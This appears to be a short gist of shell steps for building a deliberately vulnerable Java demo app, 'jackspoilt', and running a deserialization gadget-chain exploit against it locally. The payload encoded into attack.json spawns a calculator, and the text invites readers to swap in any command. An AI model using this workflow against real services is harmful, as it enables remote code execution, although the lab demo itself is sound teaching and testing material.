Created April 19, 2024 18:52
## Build the project
# spin up a shell prompt
git clone https://github.com/conikeec/jackspoilt.git
cd jackspoilt
# compile and package
mvn clean package
# verify whether gadgets are available to exploit (refer to the blog)
mvn dependency:tree
# Start application server
java -jar target/jackspoilt-1.0-SNAPSHOT.jar
## Spin up another terminal
cd jackspoilt
# create the exploit by editing ./master/exploit/Exploit.java
# the current version adds errors to the log and spawns a calculator on OSX
# (For Linux based OS please revise the line to specify an exploit of your choice)
# Modify here https://github.com/conikeec/jackspoilt/blob/master/exploit/Exploit.java#L13
# compile ./master/exploit/Exploit.java
rm attackscripts/attack.json
mvn exec:java -D"exec.mainClass"="EncodeExploit"
# The command above creates attack.json in the attackscripts directory
more attackscripts/attack.json
## Run the exploit
# Ensure that the service is running on the other terminal
# exercise the web routes
./add.sh
./list.sh
# This command injects a malicious payload and triggers the gadget chain
# (Edit exploit/Exploit.java to add your exploit command of choice)
./exploit.sh